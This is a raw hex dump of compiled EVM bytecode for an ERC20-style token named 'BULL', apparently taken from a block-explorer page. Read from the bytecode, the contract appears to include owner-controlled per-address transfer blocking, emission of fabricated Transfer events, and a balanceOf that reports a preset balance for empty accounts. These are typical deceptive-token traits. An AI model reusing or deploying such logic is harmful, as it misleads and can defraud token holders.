72616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840162000cb1565b6001600160a01b038216620019a05760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840162000cb1565b620019ad83838362001c42565b6001600160a01b0383166000908152602081905260409020548181101562001a275760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840162000cb1565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a362000feb84848462001d6f565b6001600160a01b03821662001af75760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b606482015260840162000cb1565b62001b058260008362001c42565b6001600160a01b0382166000908152602081905260409020548181101562001b7b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b606482015260840162000cb1565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3620012a78360008462001d6f565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b600062000e81828462002f98565b601954600160a01b900460ff161562001c5a57505050565b6019805460ff60a01b1916600160a01b17905562001c79838362001de0565b1562001ca457604051632f78039f60e11b81526001600160a01b038416600482015260240162000cb1565b6001600160a01b03831660009081526017602052604090205460ff1615801562001ce757506001600160a01b03821660009081526017602052604090205460ff16155b8062001cf1575080155b62001d5d576001600160a01b03831660009081526017602052604081205460ff1662001d48576001600160a01b03831660009081526017602052604090205460ff1662001d4057600062001d4b565b600262001d4b565b60015b60ff16905062001d5b8162001ed6565b505b50506019805460ff60a01b1916905550565b601954600160a01b900460ff161562001d8757505050565b6019805460ff60a01b1916600160a01b1790556001600160a01b038316158062001db857506001600160a01b038216155b62001d5d5762001dca83838362002342565b6020541562001d5d5762001d5d60205462000eef565b6001600160a01b0382166000908152601860205260408120546004148062001e2057506001600160a01b0382166000908152601860205260409020546004145b1562001e2f5750600062000993565b6001600160a01b0383166000908152601860205260409020546001148062001e6f57506001600160a01b0383166000908152601860205260409020546003145b1562001e7e5750600162000993565b6001600160a01b0382166000908152601860205260409020546002148062001ebe57506001600160a01b0382166000908152601860205260409020546003145b1562001ecd5750600162000993565b50600092915050565b8080600214158062001eeb5750600c5460ff16155b1562001ef5575050565b6007546040516370a0823160e01b81523060048201526000916001600160a01b0316906370a0823190602401602060405180830381865afa15801562001f3f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062001f6591906200313a565b600f54600d54600754604080516318160ddd60e01b8152905194955062001ff59462001fee93926001600160a01b0316916318160ddd9160048083019260209291908290030181865afa15801562001fc1573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062001fe791906200313a565b90620024aa565b90620024b8565b8110156200200257505050565b60006200206c600c6003015462001fee600c60020154600760009054906101000a90046001600160a01b03166001600160a01b03166318160ddd6040518163ffffffff1660e01b8152600401602060405180830381865afa15801562001fc1573d6000803e3d6000fd5b9050808211156200207b578091505b60008060006200208b85620024c6565b919450925090508115620021155760075460405163a9059cbb60e01b815261dead6004820152602481018490526001600160a01b039091169063a9059cbb906044016020604051808303816000875af1158015620020ed573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200211391906200311a565b505b82156200212757620021278362002541565b6008546040516370a0823160e01b81523060048201526000916001600160a01b0316906370a0823190602401602060405180830381865afa15801562002171573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200219791906200313a565b601154601254919250600091620021cc9190620021c590620021bb906002620024b8565b60135490620026f8565b90620026f8565b90506000620021f5600262001fee8462001fee60106002015488620024aa90919063ffffffff16565b90506000620022058483620026f8565b9050801562002322576000805b6014548110156200231f576200225960165462001fee601584815481106200223e576200223e62002efa565b906000526020600020015486620024aa90919063ffffffff16565b600854601480549294506001600160a01b039091169163a9059cbb91908490811062002289576200228962002efa565b60009182526020909120015460405160e083901b6001600160e01b03191681526001600160a01b039091166004820152602481018590526044016020604051808303816000875af1158015620022e3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200230991906200311a565b5080620023168162002f26565b91505062002212565b50505b8415620023355762002335858362002706565b5050505050505050505050565b6001600160a01b03831660009081526017602052604081205460ff1662002396576001600160a01b03831660009081526017602052604090205460ff166200238d57601c546200239a565b601b546200239a565b601a545b601d54909150600090620023b49062001fee8585620024aa565b6001600160a01b03861660009081526018602052604090205490915060041480620023f757506001600160a01b0384166000908152601860205260409020546004145b1562002401575060005b6001600160a01b03841660009081526017602052604090205460ff1680156200248c5750836001600160a01b03166318160ddd6040518163ffffffff1660e01b8152600401602060405180830381865afa15801562002464573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200248a91906200313a565b155b1562002496575060005b8015620008dc57620008dc843083620018d6565b600062000e81828462003154565b600062000e8182846200316e565b600080600080620024f060106003015462001fee60106001015488620024aa90919063ffffffff16565b905060006200251e600262001fee60106003015462001fee6010600201548b620024aa90919063ffffffff16565b905060006200253383620021c58985620026f8565b979296509094509092505050565b604080516002808252606082018352600092602083019080368337505060075482519293506001600160a01b03169183915060009062002585576200258562002efa565b6001600160a01b039283166020918202929092010152600854825191169082906001908110620025b957620025b962002efa565b6001600160a01b039283166020918202929092010152600954600b54604051635c11d79560e01b815291831692635c11d7959262002607928792600092889290911690429060040162003185565b600060405180830381600087803b1580156200262257600080fd5b505af115801562002637573d6000803e3d6000fd5b5050600854600b546040516370a0823160e01b81526001600160a01b03918216600482018190529190921693506323b872dd925090309084906370a0823190602401602060405180830381865afa15801562002697573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620026bd91906200313a565b6040516001600160e01b031960e086901b1681526001600160a01b0393841660048201529290911660248301526044820152606401620012e1565b600062000e818284620031c3565b6007546040516370a0823160e01b815230600482015283916001600160a01b0316906370a0823190602401602060405180830381865afa1580156200274f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200277591906200313a565b1080620027ee57506008546040516370a0823160e01b815230600482015282916001600160a01b0316906370a0823190602401602060405180830381865afa158015620027c6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620027ec91906200313a565b105b15620027f8575050565b60095460075460085460065460405162e8e33760e81b81526001600160a01b0393841660048201529183166024830152604482018690526064820185905260006084830181905260a4830152821660c48201524260e482015291169063e8e3370090610104016060604051808303816000875af11580156200287e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620008dc9190620031d9565b6101b2806200320983390190565b82805482825590600052602060002090810192821562002908579160200282015b82811115620029085781546001600160a01b0319166001600160a01b03843516178255602090920191600190910190620028d3565b506200291692915062002958565b5090565b82805482825590600052602060002090810192821562002908579160200282015b82811115620029085782518255916020019190600101906200293b565b5b8082111562002916576000815560010162002959565b60008083601f8401126200298257600080fd5b50813567ffffffffffffffff8111156200299b57600080fd5b6020830191508360208260051b8501011115620029b757600080fd5b9250929050565b600080600060408486031215620029d457600080fd5b833567ffffffffffffffff811115620029ec57600080fd5b620029fa868287016200296f565b909790965060209590950135949350505050565b600060208083528351808285015260005b8181101562002a3d5785810183015185820160400152820162002a1f565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811462000d1457600080fd5b6000806040838503121562002a8857600080fd5b823562002a958162002a5e565b946020939093013593505050565b6000806040838503121562002ab757600080fd5b50508035926020909101359150565b60006020828403121562002ad957600080fd5b5035919050565b634e487b7160e01b600052604160045260246000fd5b6040516080810167ffffffffffffffff8111828210171562002b1c5762002b1c62002ae0565b60405290565b604051601f8201601f1916810167ffffffffffffffff8111828210171562002b4e5762002b4e62002ae0565b604052919050565b60006080828403121562002b6957600080fd5b62002b7362002af6565b90508135815260208201356020820152604082013560408201526060820135606082015292915050565b60006080828403121562002bb057600080fd5b62000e81838362002b56565b60008060006060848603121562002bd257600080fd5b833562002bdf8162002a5e565b9250602084013562002bf18162002a5e565b929592945050506040919091013590565b60006080828403121562002c1557600080fd5b50919050565b60008060a0838503121562002c2f57600080fd5b823562002c3c8162002a5e565b915062002c4d846020850162002c02565b90509250929050565b801515811462000d1457600080fd5b60006080828403121562002c7857600080fd5b62002c8262002af6565b9050813562002c918162002c56565b8082525060208201356020820152604082013560408201526060820135606082015292915050565b600067ffffffffffffffff82111562002cd65762002cd662002ae0565b5060051b60200190565b600082601f83011262002cf257600080fd5b8135602062002d0b62002d058362002cb9565b62002b22565b82815260059290921b8401810191818101908684111562002d2b57600080fd5b8286015b8481101562002d48578035835291830191830162002d2f565b509695505050505050565b6000806000806000610140868803121562002d6d57600080fd5b62002d79878762002b56565b945062002d8a876080880162002c65565b935061010086013567ffffffffffffffff8082111562002da957600080fd5b62002db789838a016200296f565b909550935061012088013591508082111562002dd257600080fd5b5062002de18882890162002ce0565b9150509295509295909350565b60006020828403121562002e0157600080fd5b813562000e818162002a5e565b60006080828403121562002e2157600080fd5b62000e81838362002c65565b60008060006040848603121562002e4357600080fd5b833567ffffffffffffffff8082111562002e5c57600080fd5b62002e6a878388016200296f565b9095509350602086013591508082111562002e8457600080fd5b5062002e938682870162002ce0565b9150509250925092565b6000806040838503121562002eb157600080fd5b823562002ebe8162002a5e565b9150602083013562002ed08162002a5e565b809150509250929050565b60006080828403121562002eee57600080fd5b62000e81838362002c02565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b60006001820162002f3b5762002f3b62002f10565b5060010190565b600181811c9082168062002f5757607f821691505b60208210810362002c1557634e487b7160e01b600052602260045260246000fd5b60006020828403121562002f8b57600080fd5b815162000e818162002a5e565b8082018082111562000993576200099362002f10565b600081518084526020808501945080840160005b8381101562002fe95781516001600160a01b03168752958201959082019060010162002fc2565b509495945050505050565b8281526040602082015260006200300f604083018462002fae565b949350505050565b600060208083850312156200302b57600080fd5b825167ffffffffffffffff8111156200304357600080fd5b8301601f810185136200305557600080fd5b80516200306662002d058262002cb9565b81815260059190911b820183019083810190878311156200308657600080fd5b928401925b82841015620030a6578351825292840192908401906200308b565b979650505050505050565b634e487b7160e01b600052601260045260246000fd5b60006001600160a01b0383811680620030e457620030e4620030b1565b92169190910492915050565b6001600160a01b0381811683821601908082111562003113576200311362002f10565b5092915050565b6000602082840312156200312d57600080fd5b815162000e818162002c56565b6000602082840312156200314d57600080fd5b5051919050565b808202811582820484141762000993576200099362002f10565b600082620031805762003180620030b1565b500490565b85815284602082015260a060408201526000620031a660a083018662002fae565b6001600160a01b0394909416606083015250608001529392505050565b8181038181111562000993576200099362002f10565b600080600060608486031215620031ef57600080fd5b835192506020840151915060408401519050925092509256fe608060405234801561001057600080fd5b506040516101b23803806101b283398101604081905261002f91610113565b60405163095ea7b360e01b815233600482015260001960248201526001600160a01b0382169063095ea7b3906044016020604051808303816000875af115801561007d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906100a19190610143565b5060405163095ea7b360e01b8152336004820181905260001960248301529063095ea7b3906044016020604051808303816000875af11580156100e8573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061010c9190610143565b5050610165565b60006020828403121561012557600080fd5b81516001600160a01b038116811461013c57600080fd5b9392505050565b60006020828403121561015557600080fd5b8151801515811461013c57600080fd5b603f806101736000396000f3fe6080604052600080fdfea2646970667358221220c3a7609ddfce617720b73c53a7d54a78aeb462334ddd50b0d71c48d2f432bd3564736f6c63430008130033a2646970667358221220380e4598d8df9583489a42d0b51651f69530f8ee0adbbd5e6d6514664925ffc664736f6c63430008130033ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000152d02c7e14af6800000000000000000000000000000000000000000000000000000000000000000000442554c4c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000442554c4c00000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405260043610620002635760003560e01c806375df81a61162000147578063a457c2d711620000b9578063dd62ed3e1162000078578063dd62ed3e14620007a0578063ed4f784914620007c5578063f2fde38b14620007f6578063fc6daaaa146200081b578063fd77c960146200084057600080fd5b8063a457c2d714620006f4578063a58e0c321462000719578063a806d62e146200073e578063a9059cbb1462000763578063c4451e3e146200078857600080fd5b80638980f11f11620001065780638980f11f146200062c5780638bd2b73614620006515780638da5cb5b146200067657806395d89b4114620006965780639af1d35a14620006ae57600080fd5b806375df81a6146200057657806379cc6790146200059b5780637d3e3d1714620005c05780638187f51614620005e55780638718b24f146200060a57600080fd5b80632e6bb32111620001e15780634d7ca8ae11620001a05780634d7ca8ae14620004a25780636accdf9414620004ba5780636d49531a14620004ee57806370a082311462000539578063715018a6146200055e57600080fd5b80632e6bb32114620003f0578063313ce56714620004155780633176859a146200043357806339509351146200045857806342966c68146200047d57600080fd5b806316b19575116200022e57806316b19575146200032257806318160ddd14620003605780631d55a7dc146200038157806323b872dd14620003a657806324ec3d0f14620003cb57600080fd5b80630401208a146200027057806306fdde031462000297578063095ea7b314620002c75780630dd0cc7d14620002fd57600080fd5b366200026b57005b600080fd5b3480156200027d57600080fd5b50620002956200028f366004620029be565b62000865565b005b348015620002a457600080fd5b50620002af620008e3565b604051620002be919062002a0e565b60405180910390f35b348015620002d457600080fd5b50620002ec620002e636600462002a74565b6200097d565b6040519015158152602001620002be565b3480156200030a57600080fd5b50620002956200031c36600462002aa3565b62000999565b3480156200032f57600080fd5b50620003476200034136600462002ac6565b620009ae565b6040516001600160a01b039091168152602001620002be565b3480156200036d57600080fd5b506002545b604051908152602001620002be565b3480156200038e57600080fd5b5062000295620003a036600462002b9d565b620009d9565b348015620003b357600080fd5b50620002ec620003c536600462002bbc565b62000a01565b348015620003d857600080fd5b5062000295620003ea36600462002c1b565b62000a29565b348015620003fd57600080fd5b50620002956200040f36600462002d53565b62000a58565b3480156200042257600080fd5b5060405160098152602001620002be565b3480156200044057600080fd5b50620002956200045236600462002dee565b62000a85565b3480156200046557600080fd5b50620002ec6200047736600462002a74565b62000ce0565b3480156200048a57600080fd5b50620002956200049c36600462002ac6565b62000d08565b348015620004af57600080fd5b506200037262000d17565b348015620004c757600080fd5b50620002ec620004d936600462002dee565b60176020526000908152604090205460ff1681565b348015620004fb57600080fd5b50600c54600d54600e54600f54620005169360ff1692919084565b6040805194151585526020850193909352918301526060820152608001620002be565b3480156200054657600080fd5b50620003726200055836600462002dee565b62000e47565b3480156200056b57600080fd5b506200029562000e88565b3480156200058357600080fd5b50620002956200059536600462002e0e565b62000ea0565b348015620005a857600080fd5b5062000295620005ba36600462002a74565b62000ed6565b348015620005cd57600080fd5b5062000295620005df36600462002ac6565b62000eef565b348015620005f257600080fd5b50620002956200060436600462002dee565b62000ff1565b3480156200061757600080fd5b50600b5462000347906001600160a01b031681565b3480156200063957600080fd5b50620002956200064b36600462002a74565b620011ff565b3480156200065e57600080fd5b50620003726200067036600462002ac6565b62001327565b3480156200068357600080fd5b506005546001600160a01b031662000347565b348015620006a357600080fd5b50620002af62001349565b348015620006bb57600080fd5b50601a54601b54601c54601d54620006d39392919084565b604080519485526020850193909352918301526060820152608001620002be565b3480156200070157600080fd5b50620002ec6200071336600462002a74565b6200135a565b3480156200072657600080fd5b50620002956200073836600462002e2d565b620013db565b3480156200074b57600080fd5b50601054601154601254601354620006d39392919084565b3480156200077057600080fd5b50620002ec6200078236600462002a74565b62001551565b3480156200079557600080fd5b506200037262001561565b348015620007ad57600080fd5b5062000372620007bf36600462002e9d565b620015dd565b348015620007d257600080fd5b5062000372620007e436600462002dee565b60186020526000908152604090205481565b3480156200080357600080fd5b50620002956200081536600462002dee565b62001608565b3480156200082857600080fd5b50620002956200083a36600462002dee565b62001684565b3480156200084d57600080fd5b50620002956200085f36600462002edb565b620016af565b6200086f620016d7565b8160005b81811015620008dc57826018600087878581811062000896576200089662002efa565b9050602002016020810190620008ad919062002dee565b6001600160a01b0316815260208101919091526040016000205580620008d38162002f26565b91505062000873565b5050505050565b606060038054620008f49062002f42565b80601f0160208091040260200160405190810160405280929190818152602001828054620009229062002f42565b8015620009735780601f10620009475761010080835404028352916020019162000973565b820191906000526020600020905b8154815290600101906020018083116200095557829003601f168201915b5050505050905090565b6000336200098d81858562001733565b60019150505b92915050565b620009a3620016d7565b601f91909155602055565b60148181548110620009bf57600080fd5b6000918252602090912001546001600160a01b0316905081565b620009e3620016d7565b80516010556020810151601155604081015160125560600151601355565b60003362000a118582856200185b565b62000a1e858585620018d6565b506001949350505050565b62000a33620016d7565b62000a3e8262000a85565b62000a498262000ff1565b62000a5481620016af565b5050565b62000a62620016d7565b62000a6d85620009d9565b62000a788462000ea0565b620008dc838383620013db565b62000a8f620016d7565b6019546040805163c45a015560e01b815290516001600160a01b0390921691600091839163c45a0155916004808201926020929091908290030181865afa15801562000adf573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000b05919062002f78565b60405163e6a4390560e01b81526001600160a01b038581166004830152306024830152919091169063e6a4390590604401602060405180830381865afa15801562000b54573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000b7a919062002f78565b90506001600160a01b03811662000c6a57816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000bca573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000bf0919062002f78565b6040516364e329cb60e11b81526001600160a01b038581166004830152306024830152919091169063c9c65396906044016020604051808303816000875af115801562000c41573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000c67919062002f78565b90505b6001600160a01b03811662000cba5760405162461bcd60e51b81526020600482015260116024820152701c185a5c881a5cc81b9bdd08199bdd5b99607a1b60448201526064015b60405180910390fd5b6001600160a01b03166000908152601760205260409020805460ff191660011790555050565b6000336200098d81858562000cf68383620015dd565b62000d02919062002f98565b62001733565b62000d14338262001a95565b50565b60408051600280825260608201835260009283929190602083019080368337505060075482519293506001600160a01b03169183915060009062000d5f5762000d5f62002efa565b6001600160a01b03928316602091820292909201015260085482519116908290600190811062000d935762000d9362002efa565b6001600160a01b03928316602091820292909201015260095460405163d06ca61f60e01b815291169063d06ca61f9062000ddc90670de0b6b3a764000090859060040162002ff4565b600060405180830381865afa15801562000dfa573d6000803e3d6000fd5b505050506040513d6000823e601f3d908101601f1916820160405262000e24919081019062003017565b60018151811062000e395762000e3962002efa565b602002602001015191505090565b6001600160a01b038116600081815260208190526040812054909162000e6d5792915050565b6000811162000e7f57601f5462000e81565b805b9392505050565b62000e92620016d7565b62000e9e600062001be2565b565b62000eaa620016d7565b8051600c805460ff19169115159190911790556020810151600d556040810151600e5560600151600f55565b62000ee38233836200185b565b62000a54828262001a95565b60008060005b8381101562000feb57601e5462000f18906001600160a01b0316600019620030c7565b601e5490935062000f34906001600160a01b03166001620030f0565b601e80546001600160a01b0319166001600160a01b0392909216918217905562000f6190600019620030c7565b601e5490925062000f7d906001600160a01b03166001620030f0565b601e80546001600160a01b0319166001600160a01b03928316179055601f54604051908152848216918416907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a38062000fe28162002f26565b91505062000ef5565b50505050565b62000ffb620016d7565b600880546001600160a01b0319166001600160a01b0383169081179091556040516200102790620028a4565b6001600160a01b039091168152602001604051809103906000f08015801562001054573d6000803e3d6000fd5b50600b80546001600160a01b0319166001600160a01b0392831617905560085460095460405163095ea7b360e01b81529083166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af1158015620010c0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620010e691906200311a565b50600960009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200113b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062001161919062002f78565b60075460085460405163e6a4390560e01b81526001600160a01b039283166004820152908216602482015291169063e6a4390590604401602060405180830381865afa158015620011b6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620011dc919062002f78565b600a80546001600160a01b0319166001600160a01b039290921691909117905550565b6001600160a01b038216620012ac576006546040516000916001600160a01b03169083908381818185875af1925050503d80600081146200125d576040519150601f19603f3d011682016040523d82523d6000602084013e62001262565b606091505b5050905080620012a75760405162461bcd60e51b815260206004820152600f60248201526e1d1c985b9cd9995c8819985a5b1959608a1b604482015260640162000cb1565b505050565b60065460405163a9059cbb60e01b81526001600160a01b039182166004820152602481018390529083169063a9059cbb906044015b6020604051808303816000875af115801562001301573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620012a791906200311a565b601581815481106200133857600080fd5b600091825260209091200154905081565b606060048054620008f49062002f42565b600033816200136a8286620015dd565b905083811015620013cc5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840162000cb1565b62000a1e828686840362001733565b620013e5620016d7565b81620014295760405162461bcd60e51b815260206004820152601260248201527144414f3a43616e277420626520456d70747960701b604482015260640162000cb1565b805182146200147b5760405162461bcd60e51b815260206004820152601b60248201527f44414f3a6e756d626572206d757374206265207468652073616d650000000000604482015260640162000cb1565b6000805b8251811015620014d157620014ba838281518110620014a257620014a262002efa565b60200260200101518362001c3490919063ffffffff16565b915080620014c88162002f26565b9150506200147f565b5060008111620015245760405162461bcd60e51b815260206004820181905260248201527f44414f3a7368617265206d7573742067726561746572207468616e207a65726f604482015260640162000cb1565b6200153260148585620028b2565b508151620015489060159060208501906200291a565b50601655505050565b6000336200098d818585620018d6565b60408051600280825260608201835260009283929190602083019080368337505060085482519293506001600160a01b031691839150600090620015a957620015a962002efa565b6001600160a01b03928316602091820292909201015260075482519116908290600190811062000d935762000d9362002efa565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b62001612620016d7565b6001600160a01b038116620016795760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840162000cb1565b62000d148162001be2565b6200168e620016d7565b6001600160a01b03166000908152601760205260409020805460ff19169055565b620016b9620016d7565b8035601a556020810135601b556040810135601c5560600135601d55565b6005546001600160a01b0316331462000e9e5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000cb1565b6001600160a01b038316620017975760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840162000cb1565b6001600160a01b038216620017fa5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840162000cb1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000620018698484620015dd565b9050600019811462000feb5781811015620018c75760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640162000cb1565b62000feb848484840362001733565b6001600160a01b0383166200193c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840162000cb1565b6001600160a01b038216620019a05760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840162000cb1565b620019ad83838362001c42565b6001600160a01b0383166000908152602081905260409020548181101562001a275760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840162000cb1565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a362000feb84848462001d6f565b6001600160a01b03821662001af75760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b606482015260840162000cb1565b62001b058260008362001c42565b6001600160a01b0382166000908152602081905260409020548181101562001b7b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b606482015260840162000cb1565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3620012a78360008462001d6f565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b600062000e81828462002f98565b601954600160a01b900460ff161562001c5a57505050565b6019805460ff60a01b1916600160a01b17905562001c79838362001de0565b1562001ca457604051632f78039f60e11b81526001600160a01b038416600482015260240162000cb1565b6001600160a01b03831660009081526017602052604090205460ff1615801562001ce757506001600160a01b03821660009081526017602052604090205460ff16155b8062001cf1575080155b62001d5d576001600160a01b03831660009081526017602052604081205460ff1662001d48576001600160a01b03831660009081526017602052604090205460ff1662001d4057600062001d4b565b600262001d4b565b60015b60ff16905062001d5b8162001ed6565b505b50506019805460ff60a01b1916905550565b601954600160a01b900460ff161562001d8757505050565b6019805460ff60a01b1916600160a01b1790556001600160a01b038316158062001db857506001600160a01b038216155b62001d5d5762001dca83838362002342565b6020541562001d5d5762001d5d60205462000eef565b6001600160a01b0382166000908152601860205260408120546004148062001e2057506001600160a01b0382166000908152601860205260409020546004145b1562001e2f5750600062000993565b6001600160a01b0383166000908152601860205260409020546001148062001e6f57506001600160a01b0383166000908152601860205260409020546003145b1562001e7e5750600162000993565b6001600160a01b0382166000908152601860205260409020546002148062001ebe57506001600160a01b0382166000908152601860205260409020546003145b1562001ecd5750600162000993565b50600092915050565b8080600214158062001eeb5750600c5460ff16155b1562001ef5575050565b6007546040516370a0823160e01b81523060048201526000916001600160a01b0316906370a0823190602401602060405180830381865afa15801562001f3f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062001f6591906200313a565b600f54600d54600754604080516318160ddd60e01b8152905194955062001ff59462001fee93926001600160a01b0316916318160ddd9160048083019260209291908290030181865afa15801562001fc1573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062001fe791906200313a565b90620024aa565b90620024b8565b8110156200200257505050565b60006200206c600c6003015462001fee600c60020154600760009054906101000a90046001600160a01b03166001600160a01b03166318160ddd6040518163ffffffff1660e01b8152600401602060405180830381865afa15801562001fc1573d6000803e3d6000fd5b9050808211156200207b578091505b60008060006200208b85620024c6565b919450925090508115620021155760075460405163a9059cbb60e01b815261dead6004820152602481018490526001600160a01b039091169063a9059cbb906044016020604051808303816000875af1158015620020ed573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200211391906200311a565b505b82156200212757620021278362002541565b6008546040516370a0823160e01b81523060048201526000916001600160a01b0316906370a0823190602401602060405180830381865afa15801562002171573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200219791906200313a565b601154601254919250600091620021cc9190620021c590620021bb906002620024b8565b60135490620026f8565b90620026f8565b90506000620021f5600262001fee8462001fee60106002015488620024aa90919063ffffffff16565b90506000620022058483620026f8565b9050801562002322576000805b6014548110156200231f576200225960165462001fee601584815481106200223e576200223e62002efa565b906000526020600020015486620024aa90919063ffffffff16565b600854601480549294506001600160a01b039091169163a9059cbb91908490811062002289576200228962002efa565b60009182526020909120015460405160e083901b6001600160e01b03191681526001600160a01b039091166004820152602481018590526044016020604051808303816000875af1158015620022e3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200230991906200311a565b5080620023168162002f26565b91505062002212565b50505b8415620023355762002335858362002706565b5050505050505050505050565b6001600160a01b03831660009081526017602052604081205460ff1662002396576001600160a01b03831660009081526017602052604090205460ff166200238d57601c546200239a565b601b546200239a565b601a545b601d54909150600090620023b49062001fee8585620024aa565b6001600160a01b03861660009081526018602052604090205490915060041480620023f757506001600160a01b0384166000908152601860205260409020546004145b1562002401575060005b6001600160a01b03841660009081526017602052604090205460ff1680156200248c5750836001600160a01b03166318160ddd6040518163ffffffff1660e01b8152600401602060405180830381865afa15801562002464573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200248a91906200313a565b155b1562002496575060005b8015620008dc57620008dc843083620018d6565b600062000e81828462003154565b600062000e8182846200316e565b600080600080620024f060106003015462001fee60106001015488620024aa90919063ffffffff16565b905060006200251e600262001fee60106003015462001fee6010600201548b620024aa90919063ffffffff16565b905060006200253383620021c58985620026f8565b979296509094509092505050565b604080516002808252606082018352600092602083019080368337505060075482519293506001600160a01b03169183915060009062002585576200258562002efa565b6001600160a01b039283166020918202929092010152600854825191169082906001908110620025b957620025b962002efa565b6001600160a01b039283166020918202929092010152600954600b54604051635c11d79560e01b815291831692635c11d7959262002607928792600092889290911690429060040162003185565b600060405180830381600087803b1580156200262257600080fd5b505af115801562002637573d6000803e3d6000fd5b5050600854600b546040516370a0823160e01b81526001600160a01b03918216600482018190529190921693506323b872dd925090309084906370a0823190602401602060405180830381865afa15801562002697573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620026bd91906200313a565b6040516001600160e01b031960e086901b1681526001600160a01b0393841660048201529290911660248301526044820152606401620012e1565b600062000e818284620031c3565b6007546040516370a0823160e01b815230600482015283916001600160a01b0316906370a0823190602401602060405180830381865afa1580156200274f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200277591906200313a565b1080620027ee57506008546040516370a0823160e01b815230600482015282916001600160a01b03169063